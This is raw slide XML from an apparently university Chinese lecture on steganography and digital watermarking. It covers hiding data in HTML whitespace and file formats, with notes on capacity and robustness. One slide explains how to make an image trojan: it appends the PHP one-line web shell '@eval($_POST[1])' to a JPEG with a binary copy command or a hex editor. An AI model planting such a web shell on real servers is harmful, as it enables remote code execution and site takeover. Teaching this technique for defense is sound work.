                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>用于图像类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>声音类文件参数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</a:rPr>
              <a:t>/a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>指定以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>格式复制、合并文件。用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>等文档类文件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</a:rPr>
              <a:t>copy 1.jpg/b+1.php 2.jpg </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>意思是将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>以二进制与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>合并成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>那么</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>就是图片木马了。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> ===</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>制作一句话图片马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*指的是代码写入后不破坏图片为前提</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>图片仍可正常打开。 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第一种方法：一句话</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>: &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>($_POST[1])?&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>010 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Editor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>打开任意一张图片，将上述代码插入右边最底层或最上层后保存。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</a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137220" name="页眉占位符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Datahiding &amp; Digital Watermark</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137221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0A55D7A-40A1-4C9C-B89F-15D73564630A}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2023/10/31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7222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Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>yangyu@bupt.edu.cn</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137223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79541F5-F8A9-4654-B9F7-3019B1C93B1B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN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0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44083 w 64000"/>
                <a:gd name="T28" fmla="*/ -29639 h 64000"/>
                <a:gd name="T29" fmla="*/ 44083 w 64000"/>
                <a:gd name="T30" fmla="*/ 29639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994 w 64000"/>
                <a:gd name="T28" fmla="*/ -25761 h 64000"/>
                <a:gd name="T29" fmla="*/ 50994 w 64000"/>
                <a:gd name="T30" fmla="*/ 25761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9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C8AEA-FC78-43AC-B981-1C8065163027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94878-D791-427B-8151-09F155CFB1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394648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EE9BB-9E8C-416D-8110-2E2B272A6D0D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CE127-97CD-4181-9F2D-5E3800A4D3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186590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4DC02-577B-48C6-A295-169DE9884AAE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9DFD6-C68D-498F-B299-20C080F5E6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5173890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7313612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013" y="3960813"/>
            <a:ext cx="7313612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55AA3-D03E-4158-93E9-5BF8C2123347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F20F6-3CC4-47BF-9DFE-50AD5C3947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950506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70013" y="1827213"/>
            <a:ext cx="3579812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1370013" y="3960813"/>
            <a:ext cx="7313612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A49DB-B755-4D63-B47D-3E4CBA750AF8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0679-3851-49A7-8DB2-1AB55A4C8C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952574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66800" y="1981200"/>
            <a:ext cx="75438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24943-1882-466F-BED8-537E20ECE371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FCC48-B181-4D5F-9BE5-3361B022BE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175539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66800" y="1981200"/>
            <a:ext cx="36957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14900" y="1981200"/>
            <a:ext cx="36957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066800" y="4114800"/>
            <a:ext cx="36957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4900" y="4114800"/>
            <a:ext cx="3695700" cy="1981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BDCC4-A157-437C-9991-CDCDFDAD6AE3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8FB80-44AE-43BA-96FF-0B560065EA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249157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50187-FE32-4E63-8A06-A9F3B6809DB2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E22A0-ED15-4374-AFB9-CCC6C7D2B4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854196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90AD8-7B89-43A5-AA1A-4A1E57EAE2BF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F02B1-4C21-4263-BB0E-2F00094D98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895120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9EFA2-AD60-41C1-9EEE-A395B13702FE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B3559-9F99-4E96-B08E-79ACCA6554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452477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17E4C-01B5-42C3-99FD-C9B287B02FB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C4F83-B78C-4C65-8A12-2256524F2C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501197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BF0-AEED-4788-A9E4-9785BC596D46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4A39C-7DB8-4A8D-BCAA-3950E48DC9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3925634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AE5B7-8C2C-4122-85CB-07D4390F16DF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775D2-2CB1-4E5F-8B58-02597F560C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171229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C44CF-7C01-4D82-8CEB-3A58CA6CAD10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C9235-AC53-447A-B138-8257721311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678974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0C8E8-8635-46F7-B4C1-BBD84B841F23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71B10-85B1-4003-BAA1-B891D4618A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710243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296 w 64000"/>
                <a:gd name="T28" fmla="*/ -26244 h 64000"/>
                <a:gd name="T29" fmla="*/ 50296 w 64000"/>
                <a:gd name="T30" fmla="*/ 26244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077 w 64000"/>
                <a:gd name="T28" fmla="*/ -26412 h 64000"/>
                <a:gd name="T29" fmla="*/ 50077 w 64000"/>
                <a:gd name="T30" fmla="*/ 26412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397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fld id="{F0B3A58E-38E1-49A3-BF2E-5AB777BE8358}" type="datetime1">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/10/31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8397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altLang="zh-CN" smtClean="0"/>
              <a:t>Stegonagraphy &amp; Digital Watermark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="839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58E74A1-232E-4E1E-B1A1-1F7BBABA53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  <p:sldLayoutId id="2147484259" r:id="rId13"/>
    <p:sldLayoutId id="2147484260" r:id="rId14"/>
    <p:sldLayoutId id="2147484262" r:id="rId15"/>
  </p:sldLayoutIdLst>
  <p:transition>
    <p:dissolv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华文楷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华文楷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华文楷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华文楷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5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6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5616" y="980728"/>
            <a:ext cx="7239000" cy="1444625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN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章 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>数字</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>图像内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>安全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2915816" y="2924944"/>
            <a:ext cx="7239000" cy="1752600"/>
          </a:xfrm>
        </p:spPr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</a:rPr>
              <a:t>图像信息隐藏算法一</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18368389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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>文件中隐藏信息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dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文件是文本文件，在浏览器端仅能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显示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ASCII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码中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>可见字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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 smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>利用这一特点，可以在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的标记之间插入隐藏的数据。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 smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>比如，如果要隐藏的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二进制比特值为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latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，在选定的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>标记后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插入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ASCII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码值为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9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的字符；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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 smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>如果要隐藏的二进制比特值为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，则在选定的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>标记后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插入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ASCII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码值为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32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的字符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8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1938224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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>文件中隐藏信息：示例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宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>隐藏信息前的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文件的部分文本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33796" name="Picture 4" descr="p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8305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9603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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>文件中隐藏信息：示例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479550" y="1643063"/>
            <a:ext cx="7626350" cy="48768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 smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>隐藏信息后的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文件的相应文本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US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zh-CN" altLang="en-US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zh-CN" altLang="en-US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endParaRPr lang="en-US" altLang="zh-CN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sz="2800" dirty="0" smtClean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 smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>深颜色部分为隐藏的数据。尽管在代码文本上可以明显的看出二者之间的差异，但在浏览器端则显示不出任何差异 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34820" name="Picture 4" descr="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95513"/>
            <a:ext cx="5943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5238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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>文件中隐藏信息：示例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宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文件中隐藏了秘密数据的载体文件的部分数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35844" name="Picture 4" descr="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86063"/>
            <a:ext cx="3562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19228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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>文件中隐藏信息：示例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36867" name="Picture 4" descr="homep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33528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 descr="carri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2766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1371600" y="5257800"/>
            <a:ext cx="3930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5366" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5302250" y="5257800"/>
            <a:ext cx="254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75" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="928688" y="5214938"/>
            <a:ext cx="3930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zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0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1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>隐藏数据之前的浏览器显示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0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6876" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5000625" y="5229225"/>
            <a:ext cx="33416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zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"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sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>隐藏数据之后的浏览器显示</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"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80688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5" grpId="0"/>
      <p:bldP spid="368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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>文件中隐藏信息：示例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HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文件中隐藏的秘密数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37892" name="Picture 4" descr="Water li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71800"/>
            <a:ext cx="3657600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63922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文件格式信息隐藏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小结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</a:rPr>
              <a:t>容量分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin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</a:rPr>
              <a:t>平均每样点可以嵌入隐藏多少比特信息？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:latin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</a:rPr>
              <a:t>嵌入信息于文件格式中，嵌入量与像素个数没有直接关系。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:latin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</a:rPr>
              <a:t>因此，文件中可以隐藏“任意多”的数据。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="341849905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文件格式信息隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>小结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</a:rPr>
              <a:t>透明性分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin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</a:rPr>
              <a:t>嵌入过程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</a:rPr>
              <a:t>不修改像素</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，不会对载体本身的外观造成任何损坏。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稳健性分析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/>
              <a:t>文件的拷贝不会对隐藏的信息造成破坏 。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CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>文件存取工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>在保存文档时可能会造成隐藏数据的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>丢失</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="222086777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文件格式信息隐藏</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>小结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宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>安全性分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
              <a:latin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</a:rPr>
              <a:t>嵌入较多信息使隐写图像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大小远远超出正常值</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，隐藏的信息较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</a:rPr>
              <a:t>容易被发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:r>
